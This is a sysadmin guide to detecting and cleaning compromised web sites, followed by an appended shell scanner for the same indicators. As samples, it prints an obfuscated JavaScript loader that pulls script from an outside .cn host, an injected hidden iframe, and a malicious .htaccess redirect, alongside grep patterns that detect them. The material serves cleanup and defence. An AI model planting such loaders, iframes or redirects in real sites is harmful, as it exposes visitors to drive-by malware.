How to find hacked sites.
1. Check for the entry "eval(base64_decode" in public_html. You can list all the files containing it with the script below,
=-=-=--=-==-=-=--=-=-=
grep -irl 'eval(base64_decode("DQplcnJvcl' ./ > HACKS
-==-=--==-=-=--=-=-=-=-=
2. Now every file containing this entry can be cleaned with the script below, which first backs up the current content,
=-=--==-=--=--=-=-=-=
# read HACKS line by line and quote "$i" so file names with spaces survive
while IFS= read -r i; do cp -frp "$i" "$i-HACKED"; done < HACKS
# strip the injected line back to a bare "<?php" opening tag
while IFS= read -r i; do sed -i 's#<?php.*eval(base64_decode("DQplcnJvcl.*));#<?php#' "$i"; done < HACKS
=-=-=-=-=-=-=-=--=
Steps to prevent hacking,
1. Change the cPanel, FTP and email passwords.
2. Scan the computer.
3. Check .htaccess for a redirect rule pointing to a malicious site, like the one below,
=-==--=-=-=-=-=
RewriteRule .* http://MaliciousDomain.tld/bad.php?t=3 [R,L]
=-=-=-=-=-=-=-
4. Clean the WordPress site.
>> Move the current WordPress content to a quarantine folder. Reinstall WordPress. Scan the old plugins and theme folders. Copy them to the newly installed location. Find the db information in the old wp-config file and copy it to the new location.
How to check who has logged in to the server.
-==--=-=-=-=
last -if /var/log/wtmp | grep youruser | awk '{print $3}' | sort | uniq -c
=-=-=--=-==-
How to find directories writable by others and fix them,
=-=-=-=-
find . -type d -perm -o=w -print -exec chmod modeyouwant {} \;
-==-=-=-
This lists every directory that is writable by others and changes its mode to the one you give in place of modeyouwant.
Check for the files modified recently using the below script,
=--=-==-=-=-
find /usr/local/apache/domlogs/ ! -name "log" -mtime -3
-=-=-==--=-=-=
Code can be injected as an iframe right after the body tag, in the format below,
=-=--==-
<body><iframe src="http://somewebsite.cn/index.php" width=135 height=131 ></iframe><center>
=--==-
Here the site is redirected to the malicious site "http://somewebsite.cn/index.php".
Files containing such hidden iframes can be found with the script below,
=---==--=-=-=
grep -ri body * | grep -i iframe | grep -i hidden > hidden-iframes.txt
-==-=--=-=
Sometimes the unescape() method is used to turn hexadecimal escapes back into characters, and concatenated variables are used to build the full string, as shown below,
=-=-=--=
<script language=javascript><!--
(function(){var hiT='%';var Awi5N='var:20a:3d:22:53cr:69ptE:6e:67ine:22:2cb:3d:22Ve:72sion()+:22:2c:6a:3d:22:22:2c:75:3dnavi:67ator:2eu:73erAg:65nt:3bif:28(u:2eind:65:78Of:28:22C:68ro:6de:22:29:3c0):26:26:28u:2eindex:4ff(:22Wi:6e:22):3e0):26:26:28u:2eind:65xOf:28:22:4eT:206:22):3c0):26:26(docu:6d:65nt:2ec:6fo:6bie:2e:69:6e:64:65xOf(:22m:69ek:3d1:22):3c0:29:26:26(ty:70:65o:66(:7arvz:74s:29:21:3d:74ypeof:28:22A:22))):7bzr:76:7ats:3d:22A:22:3beva:6c(:22if(window:2e:22+a:2b:22:29j:3dj+:22+a+:22Major:22+b+a+:22:4di:6eor:22+b+a+:22:42:75i:6c:64:22:2bb+:22j:3b:22:29:3bd:6fcu:6dent:2ewr:69:74e:28:22:3cscri:70t:20s:72c:3d:2f:2fmart:22:2b:22:75z:2e:63n:2fvid:2f:3fid:3d:22:2bj+:22:3e:3c:5c:2fscrip:74:3e:22:29:3b:7d';var VAIP=Awi5N.replace(/:/g,hiT);var rMQQz=unescape(VAIP);eval(rMQQz)})();
--></script>
=-=-=-=-=-
If you find eval, unescape and a large block of obfuscated code together, the page is most likely malicious.
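Added example, not part of this note or of any project: one read-only scanner that runs the note's checks in a single pass (the eval(base64_decode grep, the hidden-iframe grep, the unescape/eval pattern, the .htaccess redirect and the others-writable find) and prints "indicator: path" per hit. The indicator names, the helper functions and the sample tree it builds are constructed for illustration.

```shell
#!/bin/sh
# Added example: scan a web root for the indicators this note lists. Read-only;
# uses find -exec so file names with spaces are handled safely.
scan_webroot() {
    root=$1
    # eval(base64_decode(...)) injected into PHP/HTML/JS files
    find "$root" -type f \( -name '*.php' -o -name '*.htm*' -o -name '*.js' \) \
        -exec grep -lF 'eval(base64_decode' {} + 2>/dev/null | sed 's/^/eval_base64: /'
    # iframe directly after <body>, or one that is hidden / 0-1px in size
    find "$root" -type f \( -name '*.php' -o -name '*.htm*' \) -exec grep -liE \
        '(<body>[[:space:]]*<iframe|<iframe[^>]*(hidden|display: *none|width="?[01]"?[^0-9]|height="?[01]"?[^0-9]))' \
        {} + 2>/dev/null | sed 's/^/hidden_iframe: /'
    # unescape() output fed to eval(): the staged decoding shown in the note
    find "$root" -type f \( -name '*.php' -o -name '*.htm*' -o -name '*.js' \) \
        -exec grep -lF 'unescape(' {} + 2>/dev/null |
    while IFS= read -r f; do
        if grep -qF 'eval(' "$f"; then printf 'eval_unescape: %s\n' "$f"; fi
    done
    # RewriteRule sending visitors to an absolute http(s) URL; review each hit
    find "$root" -type f -name '.htaccess' \
        -exec grep -liE '^[[:space:]]*RewriteRule[[:space:]].*https?://' {} + 2>/dev/null |
        sed 's/^/htaccess_redirect: /'
    # directories writable by others (-perm -002 is the POSIX form of -o=w)
    find "$root" -type d -perm -002 2>/dev/null | sed 's/^/world_writable_dir: /'
}

# Number of hits for one indicator, e.g. count_hits /home/user/public_html eval_base64
count_hits() {
    scan_webroot "$1" | grep -c "^$2: " || true
}

# Builds a constructed sample web root (not real site data) and prints its path.
make_sample_webroot() {
    d=$(mktemp -d)
    mkdir -p "$d/wp-content/plugins/my plugin" "$d/uploads"
    printf '<?php eval(base64_decode("DQplcnJvcl")); ?>\n<?php echo "hi"; ?>\n' > "$d/index.php"
    printf '<body><iframe src="http://somewebsite.cn/index.php" width=1 height=1 style="display:none"></iframe>\n' \
        > "$d/wp-content/plugins/my plugin/footer.html"
    printf '(function(){var s=unescape("%%76ar x=1");eval(s)})();\n' > "$d/app.js"
    printf 'RewriteEngine On\nRewriteRule .* http://MaliciousDomain.tld/bad.php?t=3 [R,L]\n' > "$d/.htaccess"
    printf '<?php echo "clean"; ?>\n' > "$d/clean.php"
    chmod -R go-w "$d" && chmod o+w "$d/uploads"
    printf '%s\n' "$d"
}

# Usage on a real site: scan_webroot /home/user/public_html
```

Every hit still needs a human look (a RewriteRule to your own domain is legitimate); treat the output as a worklist, not a verdict.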